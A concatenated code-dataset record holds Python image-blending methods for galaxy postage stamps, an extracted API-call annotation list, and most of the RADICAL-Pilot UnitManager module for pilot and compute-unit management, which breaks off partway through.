    @classmethod
    def _blend_pos_xwang(cls, centre, box, limits, overlap=True):
        """Draw a random blend position.

        With ``overlap`` the position lies inside the box around ``centre``;
        otherwise a sector outside the box (chosen with probability
        proportional to its area) is sampled, keeping the position within
        ``limits``.
        """

        centre, box, limits = np.array(centre), np.array(box), np.array(limits)
        if overlap:
            blend_pos = [np.random.randint(centre[i] - box[i],
                         centre[i] + box[i]) for i in range(2)]
        else:
            # BUG FIX: was `cls.area_prob`, which does not exist
            # (AttributeError); the method is named `_area_prob`.
            sector = np.random.choice(['a', 'b', 'c', 'd'],
                                      p=cls._area_prob(centre * 2, box))
            blend_pos = [None, None]
            if sector == 'a':
                blend_pos[0] = np.random.randint(limits[0][0], limits[1][0])
                blend_pos[1] = np.random.randint(limits[0][1],
                                                 centre[1] - box[1])
            elif sector == 'b':
                blend_pos[0] = np.random.randint(limits[0][0], limits[1][0])
                blend_pos[1] = np.random.randint(centre[1] + box[1],
                                                 limits[1][1])
            elif sector == 'c':
                blend_pos[0] = np.random.randint(limits[0][0],
                                                 centre[0] - box[0])
                blend_pos[1] = np.random.randint(centre[1] - box[1],
                                                 centre[1] + box[1])
            elif sector == 'd':
                # BUG FIX: upper bound was `limits[1][1]` (axis-1 limit) for
                # the axis-0 coordinate; only equivalent for square frames.
                blend_pos[0] = np.random.randint(centre[0] + box[0],
                                                 limits[1][0])
                blend_pos[1] = np.random.randint(centre[1] - box[1],
                                                 centre[1] + box[1])

        return blend_pos

    @classmethod
    def _blend_xwang(cls, image1, image2, ps_shape=(116, 116), sigma=0.15,
                     overlap=True):
        """Blend two images using random box positioning ('xwang' method).

        ``image1`` is zero-padded into a larger frame, ``image2`` is added
        at a randomly drawn position, and the result is cut down to a
        ``ps_shape`` postage stamp.
        """

        shape1, shape2 = np.array(image1.shape), np.array(image2.shape)
        rad2 = shape2 // 2
        ps_shape = np.array(ps_shape)
        shape_diff = (ps_shape - shape1) // 2 + shape2
        # The box size scales with the combined non-zero extent of both
        # objects.
        dis = cls._gal_size_xwang(image1) + cls._gal_size_xwang(image2)
        box = np.around(sigma * dis).astype(int)
        padding = ((shape_diff[0], shape_diff[0]),
                   (shape_diff[1], shape_diff[1]))
        new_image = np.pad(image1, padding, 'constant')
        new_shape = np.array(new_image.shape)
        new_centre = new_shape // 2
        limits = rad2, new_shape - rad2
        # BUG FIX: the caller's `overlap` flag was ignored (hard-coded True).
        bp = cls._blend_pos_xwang(new_centre, box, limits, overlap=overlap)
        # NOTE(review): the slice spans shape2//2 * 2 + 1 pixels, which
        # assumes image2 has odd dimensions — confirm for even-sized inputs.
        blend_slice = [slice(bp[i] - shape2[i] // 2,
                       bp[i] + shape2[i] // 2 + 1) for i in range(2)]
        new_image[blend_slice[0], blend_slice[1]] += image2
        new_image = postage_stamp(new_image, pos=new_centre,
                                    pixel_rad=ps_shape // 2)

        return new_image

    def _pad_image(self, image):
        """Zero-pad ``image`` symmetrically up to the stamp shape."""

        im_shape = np.array(image.shape)
        padding = (self.stamp_shape - im_shape) // 2

        return pad2d(image, padding)

    def _combine_images(self, image1, image2):
        """Blend one central/companion pair using the configured method."""

        if self.method == 'xwang':
            res = self._blend_xwang(image1, image2, ps_shape=self.stamp_shape,
                                    sigma=self.xwang_sigma,
                                    overlap=self.overlap)

        else:
            centre1, width1 = self._fit_image(image1)
            centre2, width2 = self._fit_image(image2)
            image1 = self._pad_image(recentre(image1, centre1))
            image2 = self._pad_image(recentre(image2, centre2))
            radius = self.ratio * (width1 + width2)
            outer_radius = image1.shape[0] / 2.
            if self.overlap:
                shift = self._random_shift(radius, seed=self.seed)
            else:
                shift = self._random_shift(radius, outer_radius=outer_radius,
                                           seed=self.seed)
            im1_cen = np.array(image1.shape) // 2
            im2_cen = np.copy(im1_cen) + np.array(shift)[::-1]
            self.obj_centres.append((tuple(im1_cen), tuple(im2_cen)))
            res = self._blend(image1, image2, shift)

        return res

    def blend(self):
        """Blend each central/companion pair and return the stamps."""

        blends = [self._combine_images(image1, image2) for image1, image2 in
                  zip(self._centrals, self._companions)]

        return np.array(blends)

    def pad(self):
        """Pad all input images to the stamp shape without blending."""

        im1_cen = np.array(self._pad_image(self._images[0]).shape) // 2
        res = []

        for image in self._images:
            res.append(self._pad_image(image))
            self.obj_centres.append((tuple(im1_cen), (None, None)))

        return np.array(res)
| [
"numpy.prod",
"numpy.copy",
"numpy.arange",
"modopt.base.np_adjust.pad2d",
"sf_tools.image.distort.recentre",
"numpy.sin",
"numpy.max",
"numpy.array",
"numpy.random.randint",
"lmfit.models.GaussianModel",
"numpy.random.seed",
"numpy.around",
"numpy.cos",
"numpy.random.ranf",
"numpy.pad",... | [((610, 631), 'numpy.array', 'np.array', (['stamp_shape'], {}), '(stamp_shape)\n', (618, 631), True, 'import numpy as np\n'), ((1178, 1193), 'lmfit.models.GaussianModel', 'GaussianModel', ([], {}), '()\n', (1191, 1193), False, 'from lmfit.models import GaussianModel, ConstantModel\n'), ((1472, 1493), 'numpy.arange', 'np.arange', (['sum_x.size'], {}), '(sum_x.size)\n', (1481, 1493), True, 'import numpy as np\n'), ((2455, 2485), 'numpy.pad', 'np.pad', (['image', 'pad', '"""constant"""'], {}), "(image, pad, 'constant')\n", (2461, 2485), True, 'import numpy as np\n'), ((5174, 5192), 'numpy.array', 'np.array', (['ps_shape'], {}), '(ps_shape)\n', (5182, 5192), True, 'import numpy as np\n'), ((5495, 5530), 'numpy.pad', 'np.pad', (['image1', 'padding', '"""constant"""'], {}), "(image1, padding, 'constant')\n", (5501, 5530), True, 'import numpy as np\n'), ((5551, 5576), 'numpy.array', 'np.array', (['new_image.shape'], {}), '(new_image.shape)\n', (5559, 5576), True, 'import numpy as np\n'), ((5934, 5999), 'sf_tools.image.stamp.postage_stamp', 'postage_stamp', (['new_image'], {'pos': 'new_centre', 'pixel_rad': '(ps_shape // 2)'}), '(new_image, pos=new_centre, pixel_rad=ps_shape // 2)\n', (5947, 5999), False, 'from sf_tools.image.stamp import postage_stamp\n'), ((6192, 6213), 'numpy.array', 'np.array', (['image.shape'], {}), '(image.shape)\n', (6200, 6213), True, 'import numpy as np\n'), ((6283, 6304), 'modopt.base.np_adjust.pad2d', 'pad2d', (['image', 'padding'], {}), '(image, padding)\n', (6288, 6304), False, 'from modopt.base.np_adjust import pad2d\n'), ((7625, 7641), 'numpy.array', 'np.array', (['blends'], {}), '(blends)\n', (7633, 7641), True, 'import numpy as np\n'), ((7920, 7933), 'numpy.array', 'np.array', (['res'], {}), '(res)\n', (7928, 7933), True, 'import numpy as np\n'), ((1954, 1974), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1968, 1974), True, 'import numpy as np\n'), ((3057, 3073), 'numpy.array', 'np.array', 
(['shape1'], {}), '(shape1)\n', (3065, 3073), True, 'import numpy as np\n'), ((3075, 3091), 'numpy.array', 'np.array', (['shape2'], {}), '(shape2)\n', (3083, 3091), True, 'import numpy as np\n'), ((3108, 3123), 'numpy.prod', 'np.prod', (['shape1'], {}), '(shape1)\n', (3115, 3123), True, 'import numpy as np\n'), ((3126, 3141), 'numpy.prod', 'np.prod', (['shape2'], {}), '(shape2)\n', (3133, 3141), True, 'import numpy as np\n'), ((3435, 3451), 'numpy.array', 'np.array', (['centre'], {}), '(centre)\n', (3443, 3451), True, 'import numpy as np\n'), ((3453, 3466), 'numpy.array', 'np.array', (['box'], {}), '(box)\n', (3461, 3466), True, 'import numpy as np\n'), ((3468, 3484), 'numpy.array', 'np.array', (['limits'], {}), '(limits)\n', (3476, 3484), True, 'import numpy as np\n'), ((5081, 5103), 'numpy.array', 'np.array', (['image1.shape'], {}), '(image1.shape)\n', (5089, 5103), True, 'import numpy as np\n'), ((5105, 5127), 'numpy.array', 'np.array', (['image2.shape'], {}), '(image2.shape)\n', (5113, 5127), True, 'import numpy as np\n'), ((1992, 2008), 'numpy.random.ranf', 'np.random.ranf', ([], {}), '()\n', (2006, 2008), True, 'import numpy as np\n'), ((2144, 2160), 'numpy.random.ranf', 'np.random.ranf', ([], {}), '()\n', (2158, 2160), True, 'import numpy as np\n'), ((3531, 3588), 'numpy.random.randint', 'np.random.randint', (['(centre[i] - box[i])', '(centre[i] + box[i])'], {}), '(centre[i] - box[i], centre[i] + box[i])\n', (3548, 3588), True, 'import numpy as np\n'), ((3877, 3922), 'numpy.random.randint', 'np.random.randint', (['limits[0][0]', 'limits[1][0]'], {}), '(limits[0][0], limits[1][0])\n', (3894, 3922), True, 'import numpy as np\n'), ((3954, 4005), 'numpy.random.randint', 'np.random.randint', (['limits[0][1]', '(centre[1] - box[1])'], {}), '(limits[0][1], centre[1] - box[1])\n', (3971, 4005), True, 'import numpy as np\n'), ((5336, 5358), 'numpy.around', 'np.around', (['(sigma * dis)'], {}), '(sigma * dis)\n', (5345, 5358), True, 'import numpy as np\n'), ((6749, 
6774), 'sf_tools.image.distort.recentre', 'recentre', (['image1', 'centre1'], {}), '(image1, centre1)\n', (6757, 6774), False, 'from sf_tools.image.distort import recentre\n'), ((6813, 6838), 'sf_tools.image.distort.recentre', 'recentre', (['image2', 'centre2'], {}), '(image2, centre2)\n', (6821, 6838), False, 'from sf_tools.image.distort import recentre\n'), ((7216, 7238), 'numpy.array', 'np.array', (['image1.shape'], {}), '(image1.shape)\n', (7224, 7238), True, 'import numpy as np\n'), ((7266, 7282), 'numpy.copy', 'np.copy', (['im1_cen'], {}), '(im1_cen)\n', (7273, 7282), True, 'import numpy as np\n'), ((1290, 1302), 'numpy.max', 'np.max', (['yval'], {}), '(yval)\n', (1296, 1302), True, 'import numpy as np\n'), ((2071, 2087), 'numpy.random.ranf', 'np.random.ranf', ([], {}), '()\n', (2085, 2087), True, 'import numpy as np\n'), ((2200, 2213), 'numpy.cos', 'np.cos', (['theta'], {}), '(theta)\n', (2206, 2213), True, 'import numpy as np\n'), ((2246, 2259), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (2252, 2259), True, 'import numpy as np\n'), ((4118, 4163), 'numpy.random.randint', 'np.random.randint', (['limits[0][0]', 'limits[1][0]'], {}), '(limits[0][0], limits[1][0])\n', (4135, 4163), True, 'import numpy as np\n'), ((4195, 4246), 'numpy.random.randint', 'np.random.randint', (['(centre[1] + box[1])', 'limits[1][1]'], {}), '(centre[1] + box[1], limits[1][1])\n', (4212, 4246), True, 'import numpy as np\n'), ((7285, 7300), 'numpy.array', 'np.array', (['shift'], {}), '(shift)\n', (7293, 7300), True, 'import numpy as np\n'), ((4359, 4410), 'numpy.random.randint', 'np.random.randint', (['limits[0][0]', '(centre[0] - box[0])'], {}), '(limits[0][0], centre[0] - box[0])\n', (4376, 4410), True, 'import numpy as np\n'), ((4491, 4548), 'numpy.random.randint', 'np.random.randint', (['(centre[1] - box[1])', '(centre[1] + box[1])'], {}), '(centre[1] - box[1], centre[1] + box[1])\n', (4508, 4548), True, 'import numpy as np\n'), ((4661, 4712), 'numpy.random.randint', 
'np.random.randint', (['(centre[0] + box[0])', 'limits[1][1]'], {}), '(centre[0] + box[0], limits[1][1])\n', (4678, 4712), True, 'import numpy as np\n'), ((4793, 4850), 'numpy.random.randint', 'np.random.randint', (['(centre[1] - box[1])', '(centre[1] + box[1])'], {}), '(centre[1] - box[1], centre[1] + box[1])\n', (4810, 4850), True, 'import numpy as np\n')] |
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import time
import threading as mt
import radical.utils as ru
from . import utils as rpu
from . import states as rps
from . import constants as rpc
from . import compute_unit_description as rpcud
# bulk callbacks are implemented, but are currently not used nor exposed.
_USE_BULK_CB = False
if os.environ.get('RADICAL_PILOT_BULK_CB', '').lower() in ['true', 'yes', '1']:
_USE_BULK_CB = True
# ------------------------------------------------------------------------------
#
class UnitManager(rpu.Component):
"""
A UnitManager manages :class:`radical.pilot.ComputeUnit` instances which
represent the **executable** workload in RADICAL-Pilot. A UnitManager
connects the ComputeUnits with one or more :class:`Pilot` instances (which
represent the workload **executors** in RADICAL-Pilot) and a **scheduler**
which determines which :class:`ComputeUnit` gets executed on which
:class:`Pilot`.
**Example**::
s = rp.Session(database_url=DBURL)
pm = rp.PilotManager(session=s)
pd = rp.ComputePilotDescription()
pd.resource = "futuregrid.alamo"
pd.cores = 16
p1 = pm.submit_pilots(pd) # create first pilot with 16 cores
p2 = pm.submit_pilots(pd) # create second pilot with 16 cores
# Create a workload of 128 '/bin/sleep' compute units
compute_units = []
for unit_count in range(0, 128):
cu = rp.ComputeUnitDescription()
cu.executable = "/bin/sleep"
cu.arguments = ['60']
compute_units.append(cu)
# Combine the two pilots, the workload and a scheduler via
# a UnitManager.
um = rp.UnitManager(session=session, scheduler=rp.SCHEDULER_ROUND_ROBIN)
um.add_pilot(p1)
um.submit_units(compute_units)
The unit manager can issue notification on unit state changes. Whenever
state notification arrives, any callback registered for that notification is
fired.
NOTE: State notifications can arrive out of order wrt the unit state model!
"""
# --------------------------------------------------------------------------
#
def __init__(self, session, cfg='default', scheduler=None):
"""
Creates a new UnitManager and attaches it to the session.
**Arguments:**
* session [:class:`radical.pilot.Session`]:
The session instance to use.
* cfg (`dict` or `string`):
The configuration or name of configuration to use.
* scheduler (`string`):
The name of the scheduler plug-in to use.
**Returns:**
* A new `UnitManager` object [:class:`radical.pilot.UnitManager`].
"""
self._pilots = dict()
self._pilots_lock = ru.RLock('umgr.pilots_lock')
self._units = dict()
self._units_lock = ru.RLock('umgr.units_lock')
self._callbacks = dict()
self._cb_lock = ru.RLock('umgr.cb_lock')
self._terminate = mt.Event()
self._closed = False
self._rec_id = 0 # used for session recording
self._uid = ru.generate_id('umgr.%(item_counter)04d',
ru.ID_CUSTOM, ns=session.uid)
for m in rpc.UMGR_METRICS:
self._callbacks[m] = dict()
# NOTE: `name` and `cfg` are overloaded, the user cannot point to
# a predefined config and amed it at the same time. This might
# be ok for the session, but introduces a minor API inconsistency.
#
name = None
if isinstance(cfg, str):
name = cfg
cfg = None
cfg = ru.Config('radical.pilot.umgr', name=name, cfg=cfg)
cfg.uid = self._uid
cfg.owner = self._uid
cfg.sid = session.uid
cfg.base = session.base
cfg.path = session.path
cfg.dburl = session.dburl
cfg.heartbeat = session.cfg.heartbeat
if scheduler:
# overwrite the scheduler from the config file
cfg.scheduler = scheduler
rpu.Component.__init__(self, cfg, session=session)
self.start()
self._log.info('started umgr %s', self._uid)
self._rep.info('<<create unit manager')
# create pmgr bridges and components, use session cmgr for that
self._cmgr = rpu.ComponentManager(self._cfg)
self._cmgr.start_bridges()
self._cmgr.start_components()
# The output queue is used to forward submitted units to the
# scheduling component.
self.register_output(rps.UMGR_SCHEDULING_PENDING,
rpc.UMGR_SCHEDULING_QUEUE)
# the umgr will also collect units from the agent again, for output
# staging and finalization
if self._cfg.bridges.umgr_staging_output_queue:
self._has_sout = True
self.register_output(rps.UMGR_STAGING_OUTPUT_PENDING,
rpc.UMGR_STAGING_OUTPUT_QUEUE)
else:
self._has_sout = False
# register the state notification pull cb
# FIXME: this should be a tailing cursor in the update worker
self.register_timed_cb(self._state_pull_cb,
timer=self._cfg['db_poll_sleeptime'])
# register callback which pulls units back from agent
# FIXME: this should be a tailing cursor in the update worker
self.register_timed_cb(self._unit_pull_cb,
timer=self._cfg['db_poll_sleeptime'])
# also listen to the state pubsub for unit state changes
self.register_subscriber(rpc.STATE_PUBSUB, self._state_sub_cb)
# let session know we exist
self._session._register_umgr(self)
self._prof.prof('setup_done', uid=self._uid)
self._rep.ok('>>ok\n')
# --------------------------------------------------------------------------
#
def initialize(self):
# the manager must not carry bridge and component handles across forks
ru.atfork(self._atfork_prepare, self._atfork_parent, self._atfork_child)
# --------------------------------------------------------------------------
#
# EnTK forks, make sure we don't carry traces of children across the fork
#
def _atfork_prepare(self): pass
def _atfork_parent(self) : pass
def _atfork_child(self) :
self._bridges = dict()
self._components = dict()
# --------------------------------------------------------------------------
#
def finalize(self):
self._cmgr.close()
# --------------------------------------------------------------------------
#
def close(self):
"""
Shut down the UnitManager and all its components.
"""
# we do not cancel units at this point, in case any component or pilot
# wants to continue to progress unit states, which should indeed be
# independent from the umgr life cycle.
if self._closed:
return
self._terminate.set()
self._rep.info('<<close unit manager')
# disable callbacks during shutdown
with self._cb_lock:
self._callbacks = dict()
for m in rpc.UMGR_METRICS:
self._callbacks[m] = dict()
self._cmgr.close()
self._log.info("Closed UnitManager %s." % self._uid)
self._closed = True
self._rep.ok('>>ok\n')
# --------------------------------------------------------------------------
#
def as_dict(self):
"""
Returns a dictionary representation of the UnitManager object.
"""
ret = {
'uid': self.uid,
'cfg': self.cfg
}
return ret
# --------------------------------------------------------------------------
#
def __str__(self):
"""
Returns a string representation of the UnitManager object.
"""
return str(self.as_dict())
# --------------------------------------------------------------------------
#
def _pilot_state_cb(self, pilots, state=None):
if self._terminate.is_set():
return False
# we register this callback for pilots added to this umgr. It will
# specifically look out for pilots which complete, and will make sure
# that all units are pulled back into umgr control if that happens
# prematurely.
#
# If we find units which have not completed the agent part of the unit
# state model, we declare them FAILED. If they can be restarted, we
# resubmit an identical unit, which then will get a new unit ID. This
# avoids state model confusion (the state model is right now expected to
# be linear), but is not intuitive for the application (FIXME).
#
# FIXME: there is a race with the umgr scheduler which may, just now,
# and before being notified about the pilot's demise, send new
# units to the pilot.
# we only look into pilot states when the umgr is still active
# FIXME: note that there is a race in that the umgr can be closed while
# we are in the cb.
# FIXME: `self._closed` is not an `mt.Event`!
if self._closed:
self._log.debug('umgr closed, ignore pilot cb %s',
['%s:%s' % (p.uid, p.state) for p in pilots])
return True
if not isinstance(pilots, list):
pilots = [pilots]
for pilot in pilots:
state = pilot.state
if state in rps.FINAL:
self._log.debug('pilot %s is final - pull units', pilot.uid)
unit_cursor = self.session._dbs._c.find({
'type' : 'unit',
'pilot' : pilot.uid,
'umgr' : self.uid,
'control' : {'$in' : ['agent_pending', 'agent']}})
if not unit_cursor.count():
units = list()
else:
units = list(unit_cursor)
self._log.debug("units pulled: %3d (pilot dead)", len(units))
if not units:
continue
# update the units to avoid pulling them again next time.
# NOTE: this needs not locking with the unit pulling in the
# _unit_pull_cb, as that will only pull umgr_pending
# units.
uids = [unit['uid'] for unit in units]
self._session._dbs._c.update({'type' : 'unit',
'uid' : {'$in' : uids}},
{'$set' : {'control' : 'umgr'}},
multi=True)
to_restart = list()
for unit in units:
unit['state'] = rps.FAILED
if not unit['description'].get('restartable'):
self._log.debug('unit %s not restartable', unit['uid'])
continue
self._log.debug('unit %s is restartable', unit['uid'])
unit['restarted'] = True
ud = rpcud.ComputeUnitDescription(unit['description'])
to_restart.append(ud)
# FIXME: increment some restart counter in the description?
# FIXME: reference the resulting new uid in the old unit.
if to_restart and not self._closed:
self._log.debug('restart %s units', len(to_restart))
restarted = self.submit_units(to_restart)
for u in restarted:
self._log.debug('restart unit %s', u.uid)
# final units are not pushed
self.advance(units, publish=True, push=False)
# keep cb registered
return True
# --------------------------------------------------------------------------
#
def _state_pull_cb(self):
if self._terminate.is_set():
return False
# pull all unit states from the DB, and compare to the states we know
# about. If any state changed, update the unit instance and issue
# notification callbacks as needed. Do not advance the state (again).
# FIXME: we also pull for dead units. That is not efficient...
# FIXME: this needs to be converted into a tailed cursor in the update
# worker
units = self._session._dbs.get_units(umgr_uid=self.uid)
for unit in units:
if not self._update_unit(unit, publish=True, advance=False):
return False
return True
# --------------------------------------------------------------------------
#
def _unit_pull_cb(self):
if self._terminate.is_set():
return False
# pull units from the agent which are about to get back
# under umgr control, and push them into the respective queues
# FIXME: this should also be based on a tailed cursor
# FIXME: Unfortunately, 'find_and_modify' is not bulkable, so we have
# to use 'find'. To avoid finding the same units over and over
# again, we update the 'control' field *before* running the next
# find -- so we do it right here.
unit_cursor = self.session._dbs._c.find({'type' : 'unit',
'umgr' : self.uid,
'control' : 'umgr_pending'})
if not unit_cursor.count():
# no units whatsoever...
# self._log.info("units pulled: 0")
return True # this is not an error
# update the units to avoid pulling them again next time.
units = list(unit_cursor)
uids = [unit['uid'] for unit in units]
self._log.info("units pulled: %d", len(uids))
for unit in units:
unit['control'] = 'umgr'
self._session._dbs._c.update({'type' : 'unit',
'uid' : {'$in' : uids}},
{'$set' : {'control' : 'umgr'}},
multi=True)
self._log.info("units pulled: %4d", len(units))
self._prof.prof('get', msg="bulk size: %d" % len(units), uid=self.uid)
for unit in units:
# we need to make sure to have the correct state:
uid = unit['uid']
self._prof.prof('get', uid=uid)
old = unit['state']
new = rps._unit_state_collapse(unit['states'])
if old != new:
self._log.debug("unit pulled %s: %s / %s", uid, old, new)
unit['state'] = new
# now we really own the CUs, and can start working on them (ie. push
# them into the pipeline).
to_stage = list()
to_finalize = list()
for unit in units:
# only advance units to data stager if we need data staging
# = otherwise finalize them right away
if unit['description'].get('output_staging'):
to_stage.append(unit)
else:
to_finalize.append(unit)
# don't profile state transitions - those happened in the past
if to_stage:
if self._has_sout:
# normal route: needs data stager
self.advance(to_stage, publish=True, push=True, prof=False)
else:
self._log.error('output staging needed but not available!')
for unit in to_stage:
unit['target_state'] = rps.FAILED
to_finalize.append(unit)
if to_finalize:
# shortcut, skip the data stager, but fake state transition
self.advance(to_finalize, state=rps.UMGR_STAGING_OUTPUT,
publish=True, push=False)
# move to final stata
for unit in to_finalize:
unit['state'] = unit['target_state']
self.advance(to_finalize, publish=True, push=False)
return True
# --------------------------------------------------------------------------
#
def _state_sub_cb(self, topic, msg):
if self._terminate.is_set():
return False
cmd = msg.get('cmd')
arg = msg.get('arg')
if cmd != 'update':
self._log.debug('ignore state cb msg with cmd %s', cmd)
return True
if isinstance(arg, list): things = arg
else : things = [arg]
cb_requests = list()
for thing in things:
if thing.get('type') == 'unit':
# we got the state update from the state callback - don't
# publish it again
to_notify = self._update_unit(thing, publish=False,
advance=False)
if to_notify:
cb_requests += to_notify
else:
self._log.debug('umgr state cb ignores %s/%s', thing.get('uid'),
thing.get('state'))
if cb_requests:
if _USE_BULK_CB:
self._bulk_cbs(set([unit for unit,state in cb_requests]))
else:
for unit,state in cb_requests:
self._unit_cb(unit, state)
return True
# --------------------------------------------------------------------------
#
def _update_unit(self, unit_dict, publish=False, advance=False):
uid = unit_dict['uid']
# return information about needed callback and advance activities, so
# that we don't break bulks here.
# note however that individual unit callbacks are still being called on
# each unit (if any are registered), which can lead to arbitrary,
# application defined delays.
to_notify = list()
with self._units_lock:
# we don't care about units we don't know
if uid not in self._units:
self._log.debug('umgr: unknown: %s', uid)
return None
unit = self._units[uid]
# only update on state changes
current = unit.state
target = unit_dict['state']
if current == target:
self._log.debug('umgr: static: %s', uid)
return None
target, passed = rps._unit_state_progress(uid, current, target)
if target in [rps.CANCELED, rps.FAILED]:
# don't replay intermediate states
passed = passed[-1:]
for s in passed:
unit_dict['state'] = s
self._units[uid]._update(unit_dict)
to_notify.append([unit, s])
# we don't usually advance state at this point, but just keep up
# with state changes reported from elsewhere
if advance:
self.advance(unit_dict, s, publish=publish, push=False,
prof=False)
self._log.debug('umgr: notify: %s %s %s', len(to_notify), unit_dict,
unit_dict['state'])
return to_notify
# --------------------------------------------------------------------------
#
def _unit_cb(self, unit, state):
with self._cb_lock:
uid = unit.uid
cb_dicts = list()
metric = rpc.UNIT_STATE
# get wildcard callbacks
cb_dicts += self._callbacks[metric].get('*', {}).values()
cb_dicts += self._callbacks[metric].get(uid, {}).values()
for cb_dict in cb_dicts:
cb = cb_dict['cb']
cb_data = cb_dict['cb_data']
try:
if cb_data: cb(unit, state, cb_data)
else : cb(unit, state)
except:
self._log.exception('cb error (%s)', cb.__name__)
# --------------------------------------------------------------------------
#
def _bulk_cbs(self, units, metrics=None):
if not metrics: metrics = [rpc.UNIT_STATE]
else : metrics = ru.as_list(metrics)
cbs = dict() # bulked callbacks to call
with self._cb_lock:
for metric in metrics:
# get wildcard callbacks
cb_dicts = self._callbacks[metric].get('*')
for cb_name in cb_dicts:
cbs[cb_name] = {'cb' : cb_dicts[cb_name]['cb'],
'cb_data': cb_dicts[cb_name]['cb_data'],
'units' : set(units)}
# add unit specific callbacks if needed
for unit in units:
uid = unit.uid
if uid not in self._callbacks[metric]:
continue
cb_dicts = self._callbacks[metric].get(uid, {})
for cb_name in cb_dicts:
if cb_name in cbs:
cbs[cb_name]['units'].add(unit)
else:
cbs[cb_name] = {'cb' : cb_dicts[cb_name]['cb'],
'cb_data': cb_dicts[cb_name]['cb_data'],
'units' : set([unit])}
for cb_name in cbs:
cb = cbs[cb_name]['cb']
cb_data = cbs[cb_name]['cb_data']
objs = cbs[cb_name]['units']
if cb_data: cb(list(objs), cb_data)
else : cb(list(objs))
# --------------------------------------------------------------------------
#
# FIXME: this needs to go to the scheduler
def _default_wait_queue_size_cb(self, umgr, wait_queue_size):
# FIXME: this needs to come from the scheduler?
if self._terminate.is_set():
return False
self._log.info("[Callback]: wait_queue_size: %s.", wait_queue_size)
# --------------------------------------------------------------------------
#
@property
def uid(self):
"""
Returns the unique id.
"""
return self._uid
# --------------------------------------------------------------------------
#
@property
def scheduler(self):
"""
Returns the scheduler name.
"""
return self._cfg.get('scheduler')
# --------------------------------------------------------------------------
#
def add_pilots(self, pilots):
"""
Associates one or more pilots with the unit manager.
**Arguments:**
* **pilots** [:class:`radical.pilot.ComputePilot` or list of
:class:`radical.pilot.ComputePilot`]: The pilot objects that will be
added to the unit manager.
"""
if not isinstance(pilots, list):
pilots = [pilots]
if len(pilots) == 0:
raise ValueError('cannot add no pilots')
with self._pilots_lock:
# sanity check, and keep pilots around for inspection
for pilot in pilots:
pid = pilot.uid
if pid in self._pilots:
raise ValueError('pilot %s already added' % pid)
self._pilots[pid] = pilot
# subscribe for state updates
pilot.register_callback(self._pilot_state_cb)
pilot_docs = [pilot.as_dict() for pilot in pilots]
# publish to the command channel for the scheduler to pick up
self.publish(rpc.CONTROL_PUBSUB, {'cmd' : 'add_pilots',
'arg' : {'pilots': pilot_docs,
'umgr' : self.uid}})
# --------------------------------------------------------------------------
#
def list_pilots(self):
"""
Lists the UIDs of the pilots currently associated with the unit manager.
**Returns:**
* A list of :class:`radical.pilot.ComputePilot` UIDs [`string`].
"""
with self._pilots_lock:
return list(self._pilots.keys())
# --------------------------------------------------------------------------
#
def get_pilots(self):
"""
Get the pilots instances currently associated with the unit manager.
**Returns:**
* A list of :class:`radical.pilot.ComputePilot` instances.
"""
with self._pilots_lock:
return list(self._pilots.values())
# --------------------------------------------------------------------------
#
def remove_pilots(self, pilot_ids, drain=False):
"""
Disassociates one or more pilots from the unit manager.
After a pilot has been removed from a unit manager, it won't process
any of the unit manager's units anymore. Calling `remove_pilots`
doesn't stop the pilot itself.
**Arguments:**
* **drain** [`boolean`]: Drain determines what happens to the units
which are managed by the removed pilot(s). If `True`, all units
currently assigned to the pilot are allowed to finish execution.
If `False` (the default), then non-final units will be canceled.
"""
# TODO: Implement 'drain'.
# NOTE: the actual removal of pilots from the scheduler is asynchron!
if drain:
raise RuntimeError("'drain' is not yet implemented")
if not isinstance(pilot_ids, list):
pilot_ids = [pilot_ids]
if len(pilot_ids) == 0:
raise ValueError('cannot remove no pilots')
with self._pilots_lock:
# sanity check, and keep pilots around for inspection
for pid in pilot_ids:
if pid not in self._pilots:
raise ValueError('pilot %s not removed' % pid)
del(self._pilots[pid])
# publish to the command channel for the scheduler to pick up
self.publish(rpc.CONTROL_PUBSUB, {'cmd' : 'remove_pilots',
'arg' : {'pids' : pilot_ids,
'umgr' : self.uid}})
# --------------------------------------------------------------------------
#
def list_units(self):
"""
Returns the UIDs of the :class:`radical.pilot.ComputeUnit` managed by
this unit manager.
**Returns:**
* A list of :class:`radical.pilot.ComputeUnit` UIDs [`string`].
"""
with self._pilots_lock:
return list(self._units.keys())
# --------------------------------------------------------------------------
#
def submit_units(self, descriptions):
"""
Submits on or more :class:`radical.pilot.ComputeUnit` instances to the
unit manager.
**Arguments:**
* **descriptions** [:class:`radical.pilot.ComputeUnitDescription`
or list of :class:`radical.pilot.ComputeUnitDescription`]: The
description of the compute unit instance(s) to create.
**Returns:**
* A list of :class:`radical.pilot.ComputeUnit` objects.
"""
from .compute_unit import ComputeUnit
ret_list = True
if not isinstance(descriptions, list):
ret_list = False
descriptions = [descriptions]
if len(descriptions) == 0:
raise ValueError('cannot submit no unit descriptions')
# we return a list of compute units
self._rep.progress_tgt(len(descriptions), label='submit')
units = list()
for ud in descriptions:
if not ud.executable:
raise ValueError('compute unit executable must be defined')
unit = ComputeUnit(umgr=self, descr=ud)
units.append(unit)
# keep units around
with self._units_lock:
self._units[unit.uid] = unit
if self._session._rec:
ru.write_json(ud.as_dict(), "%s/%s.batch.%03d.json"
% (self._session._rec, unit.uid, self._rec_id))
self._rep.progress()
self._rep.progress_done()
if self._session._rec:
self._rec_id += 1
# insert units into the database, as a bulk.
unit_docs = [u.as_dict() for u in units]
self._session._dbs.insert_units(unit_docs)
# Only after the insert can we hand the units over to the next
# components (ie. advance state).
self.advance(unit_docs, rps.UMGR_SCHEDULING_PENDING,
publish=True, push=True)
if ret_list: return units
else : return units[0]
# --------------------------------------------------------------------------
#
def get_units(self, uids=None):
"""Returns one or more compute units identified by their IDs.
**Arguments:**
* **uids** [`string` or `list of strings`]: The IDs of the
compute unit objects to return.
**Returns:**
* A list of :class:`radical.pilot.ComputeUnit` objects.
"""
if not uids:
with self._units_lock:
ret = list(self._units.values())
return ret
ret_list = True
if (not isinstance(uids, list)) and (uids is not None):
ret_list = False
uids = [uids]
ret = list()
with self._units_lock:
for uid in uids:
if uid not in self._units:
raise ValueError('unit %s not known' % uid)
ret.append(self._units[uid])
if ret_list: return ret
else : return ret[0]
# --------------------------------------------------------------------------
#
def wait_units(self, uids=None, state=None, timeout=None):
"""
Returns when one or more :class:`radical.pilot.ComputeUnits` reach a
specific state.
